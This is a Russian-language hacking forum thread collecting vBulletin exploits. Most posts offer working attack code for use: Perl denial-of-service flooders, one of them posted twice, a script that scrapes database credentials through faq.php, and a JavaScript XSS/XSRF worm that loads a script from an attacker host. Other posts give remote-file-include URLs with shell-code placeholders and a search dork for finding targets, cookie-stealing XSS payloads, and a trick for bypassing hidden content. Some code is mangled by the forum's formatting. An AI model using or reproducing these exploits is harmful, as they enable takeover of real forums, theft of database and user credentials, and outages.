Перейти к содержимому

 Друзья: Всё для вебмастера | [ Реклама на форуме ]


Rutor


[ Уязвимости vBulletin ]


  • Авторизуйтесь для ответа в теме
Сообщений в теме: 23

#1
$iD

$iD

    Админ

  • root
  • PipPipPipPipPipPip
  • 3785 сообщений
vBulletin 3.6.5, возможно более ранние версии

Опасность: Средняя
Наличие эксплоита: Нет
Описание:
Уязвимость позволяет удаленному пользователю выполнить произвольные SQL команды в базе данных приложения.

Уязвимость существует из-за недостаточной обработки входных данных в параметре "Attached Before" в сценарии admincp/attachment.php. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольные SQL команды в базе данных приложения.

URL производителя: www.vbulletin.com

Решение: Способов устранения уязвимости не существует в настоящее время.

#2
$iD

$iD

    Админ

  • root
  • PipPipPipPipPipPip
  • 3785 сообщений
XSS in admin logs - vBulletin 3.7.2 and lower, vBulletin 3.6.10 PL2 and lower

http://securityvulns...ocument137.html

Уязвимость существует из-за недостаточной обработки параметров "PHP_SELF" и "do" при запросе несуществующей страницы.

Exploit:

1) Оставляем в логах булки нашу хсс, используя данный эксплоит:
<html> <body>
<img src="http://localhost/vB/upload/admincp/faq.php/0?do=" />
</body> </html>

2) Затем отправьте админа по ссылке:
/adminlog.php?do=view&script=&u=0&pp=15&orderby=script&page=1

Ограничения:
PHP_SELF - 50 characters max and no slashes
_REQUEST['do'] is limited to 20 characters

Также сообщается, что злоумышленник может внедрить и выполнить произвольный PHP код на системе с привилегиями Web сервера.

#3
$iD

$iD

    Админ

  • root
  • PipPipPipPipPipPip
  • 3785 сообщений
vBulletin 3.x.x 'finalupgrade.php' Exploit
#/usr/bin/perl
#codEd by dEmOn | mE
# --
#   --->	http://devsn.org	<------

##	   ---=== vBulletin 3.x.x 'finalupgrade.php' Exploit ===---		##

######################################
##	NOTE: This vulnerability is not discovered by me...	 ##
##	 So, I take no credit for the vuln,,,			 ##
##   I only Coded the exploit... xD..   Anyway, idk who		##
##	discovered this vuln,, So, GJ! :)			 ##
######################################

#   --->	http://devsn.org	<------

use LWP::UserAgent;

$ua = LWP::UserAgent->new;
$ua->agent("Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)");

print "\n ---=== vBulletin 3.x 'finalupgrade.php' Exploit ===---\n\n";

print "\n===============[x]==================\n";
print "		._.	   ___________._.\n";		 
print "		| | _____ \\_   _____/| |\n";		 
print " ______ | |/	 \\ |	__)_ | |  ______\n";
print "/_____/  \\|  Y Y  \\|		\\ \\| /_____/ \n";
print "		 _|__|_|  /_______  / __ \n";	   
print "		 \\/	 \\/		\\/  \\/\n";
print "\n===============[x]==================\n";

print "\n Enter the forum URL(e.g. http://www.site.com/vb/ ): ";
$url = <STDIN>;
print "\n\nChecking for vuln..\n";

chomp($url);

my $response = $ua->get($url . 'install/finalupgrade.php?step=http://www.devsn.org');
if ($response->is_success) {
if ($response->content =~ m/vBulletin Database Backup System/gi){
print "\nExploit Success!\n";
print "\n Go TO: " . $url . "install/finalupgrade.php?step=http://www.devsn.org\n";
}
else {
print "\nNot vuln.. Exploit Failed!\n";
}
}
else {
print "\nExploit Failed:";
print "\n" . $response->status_line;
}

print "\n---=== EOF ===---\n";
print "\nhttp://devsn.org\n";
$end = <STDIN>;


#4
###

###

    Экзабайт

  • Advanced
  • PipPipPipPipPipPip
  • 1743 сообщений
XSS в 3.7.1 & 3.6.10


XSS в ХАКЕ-vBanonymizer (v 2.7)

Ссылки из под хайдов не выдаю!


#5
###

###

    Экзабайт

  • Advanced
  • PipPipPipPipPipPip
  • 1743 сообщений
vBulletin 3.7.3 Visitor Message XSS/XSRF + worm Exploit
/* -----------------------------
* Author	  = Mx
* Title	   = vBulletin 3.7.3 Visitor Messages XSS/XSRF + worm
* Software	= vBulletin
* Addon	   = Visitor Messages
* Version	 = 3.7.3
* Attack	  = XSS/XSRF

- Description = A critical vulnerability exists in the new vBulletin 3.7.3 software which comes included
+ with the visitor messages addon (a clone of a social network wall/comment area).
- When posting XSS, the data is run through htmlentities(); before being displayed
+ to the general public/forum members. However, when posting a new message,
- a new notification is sent to the commentee. The commenter posts a XSS vector such as
+ <script src="http://evilsite.com/nbd.js">, and when the commentee visits usercp.php
- under the domain, they are hit with an unfiltered xss attach. XSRF is also readily available
+ and I have included an example worm that makes the user post a new thread with your own
- specified subject and message.

* Enjoy. Greets to Zain, Ytcracker, and ]]>[url="http://forum.prologic.su/go.php?http://url=http://digitalgangster.com"]http://digitalgangster.com[/url]]]> which was the first subject
* of the attack method.
* ----------------------------- */

function getNewHttpObject() {
var objType = false;
try {
objType = new ActiveXObject('Msxml2.XMLHTTP');
} catch(e) {
try {
objType = new ActiveXObject('Microsoft.XMLHTTP');
} catch(e) {
objType = new XMLHttpRequest();
}
}
return objType;
}

function getAXAH(url){

var theHttpRequest = getNewHttpObject();
theHttpRequest.onreadystatechange = function() {processAXAH();};
theHttpRequest.open("GET", url);
theHttpRequest.send(false);

function processAXAH(){
if (theHttpRequest.readyState == 4) {
if (theHttpRequest.status == 200) {

var str = theHttpRequest.responseText;
var secloc = str.indexOf('var SECURITYTOKEN = "');
var sectok = str.substring(21+secloc,secloc+51+21);

var posloc = str.indexOf('posthash" value="');
var postok = str.substring(17+posloc,posloc+32+17);

var subject = 'subject text';
var message = 'message text';

postAXAH('http://digitalgangst...=postthread&f=5' 'subject=' + subject + '&message=' + message +
 '&wysiwyg=0&taglist=&iconid=0&s=&securitytoken=' + sectok + '&f=5&do=postthread&posthash=' + postok + 'poststarttime=1&loggedinuser=1&sbutton=
Submit+New+Thread&signature=1&parseurl=1&emailupdate=0&polloptions=4');

}
}
}
}








function postAXAH(url, params) {
var theHttpRequest = getNewHttpObject();
			  
theHttpRequest.onreadystatechange = function() {processAXAHr(elementContainer);};
theHttpRequest.open("POST", url);
theHttpRequest.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded; charset=iso-8859-2');
theHttpRequest.send(params);

function processAXAHr(elementContainer){
if (theHttpRequest.readyState == 4) {
if (theHttpRequest.status == 200) {

}
}
}
}


getAXAH('http://digitalgangst...o=newthread&f=5');
document.write('<iframe src="http://digitalgangst...newthread&f=5">');

# milw0rm.com [2008-11-20]

Ссылки из под хайдов не выдаю!


#6
###

###

    Экзабайт

  • Advanced
  • PipPipPipPipPipPip
  • 1743 сообщений
vBulletin vbBux/vbPlaza <= 2.x (vbplaza.php) Blind SQL Injection Vuln

Ссылки из под хайдов не выдаю!


#7
###

###

    Экзабайт

  • Advanced
  • PipPipPipPipPipPip
  • 1743 сообщений
vBulletin® Version 3.8.2 Denial of Service Exploit
#!usr/bin/perl
#vBulletin® Version 3.8.2 Denial of Service Exploit
#ea$y Laster
########################################################################
# Modules															  #
########################################################################
use IO::SOCKET;		   # Object interface						   #
########################################################################
if (@ARGV<1){
print"
########################################################################
## _					 _	 _				   _				  ##
##| |_ ___ ___ _____ ___|_|___| |_ ___ ___ ___ ___| |_				##
##|  _| -_| .'|	 |___| |   |  _| -_|  _|   | -_|  _|			   ##
##|_| |___|__,|_|_|_|   |_|_|_|_| |___|_| |_|_|___|_|				 ##
##																	##
########################################################################
########################################################################
##								##								  ##
##->vBulletin® Version 3.8.2<-	##								  ##
##								##								  ##
##Gebe diese Daten an			 ##								  ##
##1.Ziel						  ##[*] www.Ziel.com				  ##
##2.Board						 ##[*] vbulletin					 ##
##3.Verwundbarkeit				##[*] forumdisplay.php?f=		   ##
##4.Zeit des vorganges			##[*] 9999999999999999			  ##
##5.Port						  ##[*] 80							##
########################################################################
\a";}
$block = "
########################################################################";
$fehler = "Fehler!Fehler!Fehler!Fehler";
$x =0;
	 print"$block\n";
	 print q(Ziel->);
	 chomp($ziel =<STDIN>);
	 if ($ziel eq""){
	 die "$fehler\a\n";}
	 print"$block\n";
	   print"$block\n";
	   print q(Path->);
	   chomp($path =<STDIN>);
	   if ($path eq "") {
	   die "$fehler !\a\n";}
	   print"$block\n";
		  print"$block\n";
		  print "Verwundbarkeit\n";
		  print"forumdisplay.php?f=\n";
		  print"->"n;
			chomp($vul =<STDIN>);
			if ($vul eq "") {
			die "$fehler !\a\n";}
			print"$block\n";
			   print"$block\n";
			   print q(Time->);
			   chomp($flood =<STDIN>);
			   if ($flood eq "") {
			   die "$fehler !\a\n";}
				  print"$block\n";
				  print"$block\n";
				  print q(Port->);
				  chomp($port =<STDIN>);
				  if ($port eq ""){
				  die "$fehler \n";}
				  print"$block\n";
					 print q(Send "start"->);
					 chomp($start =<STDIN>);
					 if ($start eq "") {
					 die "$fehler\n";}
print "$block\a\n";
print "[+]Konntroliere Daten \n";
print "[*]Kontroliere Ziel   : $ziel\n";
print "[*]Kontroliere Board  : $path\n";
print "[*]Kontroliere Port   : $port\n";
print "$block\n";
if($start == 1){
while($x != 0000){
$x++;}
}elsif ($start == start){
while($x != $flood)
{
$postit = "$ziel"."$path"."$vul";
$lrg = length $postit;
$sock = new IO::Socket::INET (
							   PeerAddr => "$ziel",
							   PeerPort => "$port",
							   Proto => "tcp",
							  );

print $sock "POST $path$vul HTTP/1.1\n";
print $sock "Host: $ziel\n";
print $sock "Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5\n";
print $sock "Referer: $ziel\n";
print $sock "Accept-Language: en-us\n";
print $sock "Content-Type: application/x-www-form-urlencoded\n";
print $sock "User-Agent: Mozilla/5.0 (BeOS; U; BeOS X.6; en-US; rv:1.7.8) Gecko/20070421 Firefox/2.0.0\n";
print $sock "Content-Length: $lrg\n\n";
print $sock "$postit\n";
close($sock);
syswrite STDOUT, "->BLACKOUT<-";
$x++;
}
}else{
die "Fehler kann nicht zum Ziel verbinden $ziel !\n";
}  

Ссылки из под хайдов не выдаю!


#8
###

###

    Экзабайт

  • Advanced
  • PipPipPipPipPipPip
  • 1743 сообщений
vBulletin Version 3.8.2 Denial of Service Exploit
#!usr/bin/perl
#vBulletin® Version 3.8.2 Denial of Service Exploit
#ea$y Laster
########################################################################
# Modules															  #
########################################################################
use IO::SOCKET;		   # Object interface						   #
########################################################################
if (@ARGV<1){
print"
########################################################################
## _					 _	 _				   _				  ##
##| |_ ___ ___ _____ ___|_|___| |_ ___ ___ ___ ___| |_				##
##|  _| -_| .'|	 |___| |   |  _| -_|  _|   | -_|  _|			   ##
##|_| |___|__,|_|_|_|   |_|_|_|_| |___|_| |_|_|___|_|				 ##
##																	##
########################################################################
########################################################################
##								##								  ##
##->vBulletin® Version 3.8.2<-	##								  ##
##								##								  ##
##Gebe diese Daten an			 ##								  ##
##1.Ziel						  ##[*] www.Ziel.com				  ##
##2.Board						 ##[*] vbulletin					 ##
##3.Verwundbarkeit				##[*] forumdisplay.php?f=		   ##
##4.Zeit des vorganges			##[*] 9999999999999999			  ##
##5.Port						  ##[*] 80							##
########################################################################
\a";}
$block = "
########################################################################";
$fehler = "Fehler!Fehler!Fehler!Fehler";
$x =0;
	 print"$block\n";
	 print q(Ziel->);
	 chomp($ziel =<STDIN>);
	 if ($ziel eq""){
	 die "$fehler\a\n";}
	 print"$block\n";
	   print"$block\n";
	   print q(Path->);
	   chomp($path =<STDIN>);
	   if ($path eq "") {
	   die "$fehler !\a\n";}
	   print"$block\n";
		  print"$block\n";
		  print "Verwundbarkeit\n";
		  print"forumdisplay.php?f=\n";
		  print "->n";
			chomp($vul =<STDIN>);
			if ($vul eq "") {
			die "$fehler !\a\n";}
			print"$block\n";
			   print"$block\n";
			   print q(Time->);
			   chomp($flood =<STDIN>);
			   if ($flood eq "") {
			   die "$fehler !\a\n";}
				  print"$block\n";
				  print"$block\n";
				  print q(Port->);
				  chomp($port =<STDIN>);
				  if ($port eq ""){
				  die "$fehler \n";}
				  print"$block\n";
					 print q(Send "start"->);
					 chomp($start =<STDIN>);
					 if ($start eq "") {
					 die "$fehler\n";}
print "$block\a\n";
print "[+]Konntroliere Daten \n";
print "[*]Kontroliere Ziel   : $ziel\n";
print "[*]Kontroliere Board  : $path\n";
print "[*]Kontroliere Port   : $port\n";
print "$block\n";
if($start == 1){
while($x != 0000){
$x++;}
}elsif ($start == start){
while($x != $flood)
{
$postit = "$ziel"."$path"."$vul";
$lrg = length $postit;
$sock = new IO::Socket::INET (
							   PeerAddr => "$ziel",
							   PeerPort => "$port",
							   Proto => "tcp",
							  );

print $sock "POST $path$vul HTTP/1.1\n";
print $sock "Host: $ziel\n";
print $sock "Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5\n";
print $sock "Referer: $ziel\n";
print $sock "Accept-Language: en-us\n";
print $sock "Content-Type: application/x-www-form-urlencoded\n";
print $sock "User-Agent: Mozilla/5.0 (BeOS; U; BeOS X.6; en-US; rv:1.7.8) Gecko/20070421 Firefox/2.0.0\n";
print $sock "Content-Length: $lrg\n\n";
print $sock "$postit\n";
close($sock);
syswrite STDOUT, "->BLACKOUT<-";
$x++;
}
}else{
die "Fehler kann nicht zum Ziel verbinden $ziel !\n";
}

Ссылки из под хайдов не выдаю!


#9
###

###

    Экзабайт

  • Advanced
  • PipPipPipPipPipPip
  • 1743 сообщений
vBulletin v 4.0.1 XSS Vulnerability
http://127.0.0.1/upl...rt(213771818860)</script>
]]>[url="http://forum.prologic.su/go.php?http://127.0.0.1/upload/faq.php?acuparam=&gt;&quot;&gt;<script&gt;alert(213771818860)&lt;/script&gt;"]http://127.0.0.1/upl....</script>[/url]]]>
]]>[url="http://forum.prologic.su/go.php?http://127.0.0.1/upload/forum.php?acuparam=&gt;&quot;&gt;<script&gt;alert(213771818860)&lt;/script&gt;"]http://127.0.0.1/upl....</script>[/url]]]>
]]>[url="http://forum.prologic.su/go.php?http://127.0.0.1/upload/usercp.php/&gt;&quot;&gt;<script&gt;alert(213771818860)&lt;/script&gt;"]http://127.0.0.1/upl....</script>[/url]]]>
]]>[url="http://forum.prologic.su/go.php?http://127.0.0.1/upload/subscription.php?acuparam=&gt;&quot;&gt;<script&gt;alert(213771818860)&lt;/script&gt;"]http://127.0.0.1/upl....</script>[/url]]]>
]]>[url="http://forum.prologic.su/go.php?http://127.0.0.1/upload/showthread.php?acuparam=&gt;&quot;&gt;<script&gt;alert(213771818860)&lt;/script&gt;"]http://127.0.0.1/upl....</script>[/url]]]>
]]>[url="http://forum.prologic.su/go.php?http://127.0.0.1/upload/showgroups.php/&gt;&quot;&gt;<script&gt;alert(213771818860)&lt;/script&gt;"]http://127.0.0.1/upl....</script>[/url]]]>
]]>[url="http://forum.prologic.su/go.php?http://127.0.0.1/upload/sendmessage.php/&gt;&quot;&gt;<script&gt;alert(213771818860)&lt;/script&gt;"]http://127.0.0.1/upl....</script>[/url]]]>
]]>[url="http://forum.prologic.su/go.php?http://127.0.0.1/upload/search.php/&gt;&quot;&gt;<script&gt;alert(213771818860)&lt;/script&gt;"]http://127.0.0.1/upl....</script>[/url]]]>
]]>[url="http://forum.prologic.su/go.php?http://127.0.0.1/upload/register.php?acuparam=&gt;&quot;&gt;<script&gt;alert(213771818860)&lt;/script&gt;"]http://127.0.0.1/upl....</script>[/url]]]>
]]>[url="http://forum.prologic.su/go.php?http://127.0.0.1/upload/profile.php?acuparam=&gt;&quot;&gt;<script&gt;alert(213771818860)&lt;/script&gt;"]http://127.0.0.1/upl....</script>[/url]]]>
]]>[url="http://forum.prologic.su/go.php?http://127.0.0.1/upload/private.php?acuparam=&gt;&quot;&gt;<script&gt;alert(213771818860)&lt;/script&gt;"]http://127.0.0.1/upl....</script>[/url]]]>
]]>[url="http://forum.prologic.su/go.php?http://127.0.0.1/upload/online.php/&gt;&quot;&gt;<script&gt;alert(213771818860)&lt;/script&gt;"]http://127.0.0.1/upl....</script>[/url]]]>
]]>[url="http://forum.prologic.su/go.php?http://127.0.0.1/upload/newthread.php?acuparam=&gt;&quot;&gt;<script&gt;alert(213771818860)&lt;/script&gt;"]http://127.0.0.1/upl....</script>[/url]]]>
]]>[url="http://forum.prologic.su/go.php?http://127.0.0.1/upload/misc.php/&gt;&quot;&gt;<script&gt;alert(213771818860)&lt;/script&gt;"]http://127.0.0.1/upl....</script>[/url]]]>
]]>[url="http://forum.prologic.su/go.php?http://127.0.0.1/upload/memberlist.php?=&gt;&quot;'&gt;<script&gt;alert(213771818860)&lt;/script&gt;"]http://127.0.0.1/upl....</script>[/url]]]>
]]>[url="http://forum.prologic.su/go.php?http://127.0.0.1/upload/member.php/&gt;&quot;&gt;<script&gt;alert(213771818860)&lt;/script&gt;"]http://127.0.0.1/upl....</script>[/url]]]>
]]>[url="http://forum.prologic.su/go.php?http://127.0.0.1/upload/inlinemod.php?acuparam=&gt;&quot;&gt;<script&gt;alert(213771818860)&lt;/script&gt;"]http://127.0.0.1/upl....</script>[/url]]]>
]]>[url="http://forum.prologic.su/go.php?http://127.0.0.1/upload/index.php/&gt;&quot;&gt;<script&gt;alert(213771818860)&lt;/script&gt;"]http://127.0.0.1/upl....</script>[/url]]]>
]]>[url="http://forum.prologic.su/go.php?http://127.0.0.1/upload/forumdisplay.php?acuparam=&gt;&quot;&gt;<script&gt;alert(213771818860)&lt;/script&gt;"]http://127.0.0.1/upl....</script>[/url]]]>
]]>[url="http://forum.prologic.su/go.php?http://127.0.0.1/path/search.php?search_type=1&contenttype=vBBlog_BlogEntry&query=&quot;&gt;<script&gt;alert('xss&#39%3b%29;&lt;/script&gt;"]http://127.0.0.1/pat....</script>[/url]]]>
]]>[url="http://forum.prologic.su/go.php?http://127.0.0.1/path/search.php?search_type=1&contenttype=vBBlog_BlogEntry&query=&quot;&gt;<script&gt;alert(document.cookie);&lt;/script&gt;"]http://127.0.0.1/pat....</script>[/url]]]>
vBulletin 0-day Denial Of Service Exploit
use Socket;
if (@ARGV < 2) { &usage }
$rand=rand(10);
$host = $ARGV[0];
$dir = $ARGV[1];
$host =~ s/(http:\/\/)//eg;
for ($i=0; $i<10; $i--)
{
$user="vb".$rand.$i;
$data = "s="
;
$len = length $data;
$foo = "POST ".$dir."index.php HTTP/1.1\r\n".
"Accept: * /*\r\n".
"Accept-Language: en-gb\r\n".
"Content-Type: application/x-www-form-urlencoded\r\n".
"Accept-Encoding: gzip, deflate\r\n".
"User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\r\n".
"Host: $host\r\n".
"Content-Length: $len\r\n".
"Connection: Keep-Alive\r\n".
"Cache-Control: no-cache\r\n\r\n".
"$data";
my $port = "80";
my $proto = getprotobyname('tcp');
socket(SOCKET, PF_INET, SOCK_STREAM, $proto);
connect(SOCKET, sockaddr_in($port, inet_aton($host))) || redo;
send(SOCKET,"$foo", 0);
syswrite STDOUT, "+";
}
print "\n\n";
system('ping $host');
sub usage {
print "\tusage: \n";
print "\t$0 \n";
print "\tex: $0 127.0.0.1 /forum/\n";
print "\tex2: $0 127.0.0.1 /\n\n";
exit();
};

Ссылки из под хайдов не выдаю!


#10
###

###

    Экзабайт

  • Advanced
  • PipPipPipPipPipPip
  • 1743 сообщений
Vbulletin Version 4.0.2 Remote File Include Vulnerability
######################################################################
#
# Vbulletin Version 4.0.2 Remote File Include !
#
# Author : D.0.M TEAM
#
# Founded By : S3Ri0uS !
#
# We Are : Inj3ct0r.com Exploit and Vulnerability Database.
#
# Public Site : WwW.Anti-Secure.CoM !
#
# Security Site : WwW.D0M-Security.NeT !
#
# Contact 1 : S3Ri0uS.Blackhat@Gmail.CoM !
#
# Contact 2 : S3Ri0uS_Blackhat@Yahoo.CoM !
#
# SpT : All Iranian Hackers !
#
######################################################################
#
# Dork :
#
# inurl:"powered by vbulletin version 4.0.2"
#
# Exploit :
#
# ]]>[url="http://forum.prologic.su/go.php?http://www.site.com/path/includes/class_block.php?classfile="]http://www.site.com/...classfile=[/url]]]>[shell code]
#
# ]]>[url="http://forum.prologic.su/go.php?http://www.site.com/path/vb/vb.php?filename="]http://www.site.com/...?filename=[/url]]]>[shell code]
#
# ]]>[url="http://forum.prologic.su/go.php?http://www.site.com/path/packages/vbattach/attach.php?include_file="]http://www.site.com/...lude_file=[/url]]]>[shell code]
#
######################################################################

Ссылки из под хайдов не выдаю!


#11
$iD

$iD

    Админ

  • root
  • PipPipPipPipPipPip
  • 3785 сообщений
Свежий баг в vBulletin под свежую версию 3.8.6: vBulletin 3.8.6 faq.php Information Disclosure Vulnerability
з.ы. Рекомендую обновиться до pl1. А тем кто сидит на 3.8.4 pl2 вообще не стоит ничего менять :)

#12
###

###

    Экзабайт

  • Advanced
  • PipPipPipPipPipPip
  • 1743 сообщений
vBulletin® Version 3.8.6 Exploit
Юзает свежую уязвимость в движке 3.8.6.
#!/usr/bin/perl
use strict;
use LWP::Simple;
use HTML::Parser;
use Data::Dumper;
my $url = shift @ARGV;
my $line;
die "No URL specified on command line." unless (defined $url);
my $url2 = "$url\/install\/vbulletin-language.xml";
my $content = get($url2); #put site html in $content.
die "get failed" if (!defined $content); 

if ($content =~ m/database_ingo/) {
	$url2 = "$url\/faq.php\?s=\&do=search\&q=data\&match=all\&titlesonly=0";
	$content = get($url2);
	die "Get Failed" if (!defined $content);
	open(MYDATA, ">aaaaa.txt");
	print MYDATA $content;
	close MYDATA;
	open(NEDATA, "<aaaaa.txt");
		while($line = <NEDATA>) {
			if ($line =~ m/Host:/) {
				$line =~ s/<span class=\"highlight\">Database\<\/span>//;
				$line =~ s/\<br \/\>//;
				print "$line\n";
			}
			if ($line =~ m/Username:/) {
				$line =~ s/<span class=\"highlight\">Database<\/span>//;
				$line =~ s/<br \/>//;
				print "$line\n";
			}
			if ($line =~ m/Password:/) {
				$line =~ s/<span class=\"highlight\">Database<\/span>//;
				$line =~ s/<\/td>//;
				print "$line\n";
			}
		}
	close NEDATA;
	unlink($url2);
} else {
print "Not vulnerable!\n";
}

Ссылки из под хайдов не выдаю!


#13
$iD

$iD

    Админ

  • root
  • PipPipPipPipPipPip
  • 3785 сообщений
Уязвимость VBSEO 3.3.2
Степень: критическая
Автор: S(r1pt - xaknet.ru
Описание: уязвимость позволяет заинклудить локальный файл(картинку), для успешной эксплуатации уязвимости нужно, чтобы аватарки либо юзербары на форуме хранились в файлах и были разрешены для установки.
Пример: вывод текста гиф файла прям в браузер:
http://myp2pforum.eu/vbseo.php?vbseourl=images/statusicon/post_old.gif%00.php


#14
###

###

    Экзабайт

  • Advanced
  • PipPipPipPipPipPip
  • 1743 сообщений
vBulletin v4.0.4 adserver Javascript (forumdisplay.php) Code Execution

Ссылки из под хайдов не выдаю!


#15
###

###

    Экзабайт

  • Advanced
  • PipPipPipPipPipPip
  • 1743 сообщений
vBulletin 3.8.4 & 3.8.5 Registration Bypass Vulnerability

Ссылки из под хайдов не выдаю!


#16
$iD

$iD

    Админ

  • root
  • PipPipPipPipPipPip
  • 3785 сообщений
vBulletin 4.1.2 0-day Denial Of Service Exploit
=========================================

vBulletin 4.1.2
0-day Denial Of
Service Exploit

=========================================



			The
largest Exploit
Database in the
world !



1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0

0	 _			
__		   __	 
__				  

1   /' \		   
__  /'__`\		/\
\__  /'__`\		 

0  /\_, \	___  
/\_\/\_\ \ \	___\
\ ,_\/\ \/\ \  _ ___

1  \/_/\ \ /' _ `\
\/\ \/_/_\_<_
/'___\ \ \/\ \ \ \
\/\`'__\		  0

0	 \ \ \/\ \/\ \
\ \ \/\ \ \ \/\
\__/\ \ \_\ \ \_\ \
\ \/		   1

1	  \ \_\ \_\
\_\_\ \ \ \____/\
\____\\ \__\\
\____/\ \_\		 

0	  
\/_/\/_/\/_/\ \_\
\/___/  \/____/
\/__/ \/___/  \/_/  

1				 
\ \____/ >> Exploit
database separated
by exploit   0

0				  
\/___/		  type
(local, remote, DoS,
etc.)	1

1				  

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-1




#[+] Site		  
: Inj3ct0r is gonna
be up
#
# Created again by
SeeMe
#
# Greetz to
Sid3^effects,
Indoushka,
The_Exploited,
gunslinger,
Sn!pEr.S!Te,
n4pst3r,
# SONiC, Th3 RDX,
agix, anT!-Tr0J4n,
eidelweiss, r0073r,
L0rd CruSad3r
#
# Vbulletin 4.1.2
0-day tested & passed
#
#Perl Script
use Socket;
if (@ARGV < 2) {
&usage }
$rand=rand(10);
$host = $ARGV[0];
$dir = $ARGV[1];
$host =~
s/(http:\/\/)//eg;
for ($i=0; $i<10;
$i--)
{
$user="vb".$rand.$i;
$data = "s=&"
;
$len = length $data;
$foo = "POST
".$dir."blog.php
HTTP/1.1\r\n".
"Accept: * /*\r\n".
"Accept-Language:
en-gb\r\n".
"Content-Type:
application/x-www-form-urlencoded\r\n".
"Accept-Encoding:
gzip, deflate\r\n".
"User-Agent:
Mozilla/4.0
(compatible; MSIE
6.0; Windows NT
5.0)\r\n".
"Host: $host\r\n".
"Content-Length:
$len\r\n".
"Connection:
Keep-Alive\r\n".
"Cache-Control:
no-cache\r\n\r\n".
"$data";
my $port = "80";
my $proto =
getprotobyname('tcp');
socket(SOCKET,
PF_INET,
SOCK_STREAM, $proto);
connect(SOCKET,
sockaddr_in($port,
inet_aton($host)))
|| redo;
send(SOCKET,"$foo",
0);
syswrite STDOUT,
"+" ;
}
print "\n\n";
system('ping
$host');
sub usage {
print "\tusage: \n";
print "\t$0 \n";
print "\tex: $0
127.0.0.1 /forum/\n";
print "\tex2: $0
127.0.0.1 /\n\n";
exit();
};


################################
# Greetz to all
inj3ct0r Crew  #
################################ 


#17
$iD

$iD

    Админ

  • root
  • PipPipPipPipPipPip
  • 3785 сообщений
Обход хайда в булке. Как пользоваться:
http://forum.mysite.ru/showthread.php?p=1&highlight=[HIDE


#18
Fin

Fin

    Бит

  • Banned
  • 15 сообщений
а есть баги по скулю в новых версиях? как-то говорили об этом, но на деле что-то тихо вроде.

#19
$iD

$iD

    Админ

  • root
  • PipPipPipPipPipPip
  • 3785 сообщений
vBulletin 4.1.2 SQL Injection

#20
Versus71

Versus71

    Байт

  • Members
  • Pip
  • 108 сообщений

Просмотр сообщения$iD (22.5.2011, 0:31) писал:

В дополнение к данной уязвимости.


Ни имени, ни прошлого... и нечего терять

CyberMake.ru   [Only Quality Software]

aka HIMIKAT

#21
###

###

    Экзабайт

  • Advanced
  • PipPipPipPipPipPip
  • 1743 сообщений

vBulletin® Version 4.1.7 Beta 1 Mullti Vulnerability


====================================================
vBulletin® Version 4.1.7 Beta 1 Mullti Vulnerability
====================================================

1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=0
0	.	.--.   .--.   .---.	  .				  1
1  .'|		)	  )	  /	  |				  0
0	|	 --:	--:	  /	.-.| .-.  .  .		1
1	|		)	  )	/	(   |(   ) |  |		0
0  '---'  `--'   `--'	'	  `-'`-`-'`-`--|		1
1											;		0
0	 Site			: 1337day.com		`-'		1
1	 Support e-mail  : submit[at]inj3ct0r.com		0
0	 >> Exploit database separated by exploit		1
1		   type (local, remote, DoS, etc.)		   0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=1

#######################################################

		   # Vendor: noLogging by SCRiPTZSECTOR.ORG

				 # Date: 2011-07-27

				# Author : indoushka

			+++=[ Dz Offenders Cr3w ]=+++

		 # KedAns-Dz * Caddy-Dz * Kalashinkov3

	  # Jago-dz * Kha&miX * T0xic * Ev!LsCr!pT_Dz

		   # Contact : ind0ushka@hotmail.com

	 # Tested on : win SP2 + SP3 Fr / Back | Track 5 fr

########################################################################  

# Exploit By indoushka
-------------

Powered by vBulletin® Version 4.1.7 Beta 1

RFI :
Function: include	File: api.php			Line: 139
Exploit: http://localhost/vB1...pi_script=[EV!L]

##################################################

Function: include	File: api.php			Line: 139
Exploit: http://localhost/vB1...pi_script=[EV!L]

##################################################

Function: require_once	File: payment_gateway.php			Line: 3
Exploit: http://localhost/vB1...classname=[EV!L]

##################################################

Function: require_once	File: payment_gateway.php			Line: 3
Exploit: http://localhost/vB1...classname=[EV!L]

##################################################

Function: include_once	File: cronadmin.php			Line: 4
Exploit: http://localhost/vB1...[filename=[EV!L]

##################################################

Function: include	File: diagnostic.php			Line: 12
Exploit: http://localhost/vB1...p?match[0=[EV!L]

##################################################

Function: require_once	File: diagnostic.php			Line: 18
Exploit: http://localhost/vB1...classname=[EV!L]

##################################################

Function: require_once	File: diagnostic.php			Line: 18
Exploit: http://localhost/vB1...classname=[EV!L]

##################################################

Function: include_once	File: plugin.php			Line: 22
Exploit: http://localhost/vB1...hp?safeid=[EV!L]

##################################################

Function: include_once	File: plugin.php			Line: 22
Exploit: http://localhost/vB1...hp?safeid=[EV!L]

##################################################

Function: include_once	File: class_block.php			Line: 14
Exploit: http://localhost/vB1....php?file=[EV!L]

##################################################

Function: require_once	File: class_humanverify.php			Line: 2
Exploit: http://localhost/vB1...chosenlib=[EV!L]

##################################################

Function: require_once	File: class_humanverify.php			Line: 2
Exploit: http://localhost/vB1...chosenlib=[EV!L]

##################################################

Function: require_once	File: class_paid_subscription.php			Line: 24
Exploit: http://localhost/vB1...classname=[EV!L]

##################################################

Function: require_once	File: class_paid_subscription.php			Line: 24
Exploit: http://localhost/vB1...classname=[EV!L]

##################################################

Function: require_once	File: functions.php			Line: 6
Exploit: http://localhost/vB1...classfile=[EV!L]

##################################################

Function: require_once	File: functions.php			Line: 6
Exploit: http://localhost/vB1...classfile=[EV!L]

##################################################

Function: include_once	File: functions_cron.php			Line: 8
Exploit: http://localhost/vB1...[filename=[EV!L]

##################################################

Function: require	File: vb.php			Line: 7
Exploit: http://localhost/vB1...?filename=[EV!L]

##################################################

Function: require_once	File: class_upgrade.php			Line: 48
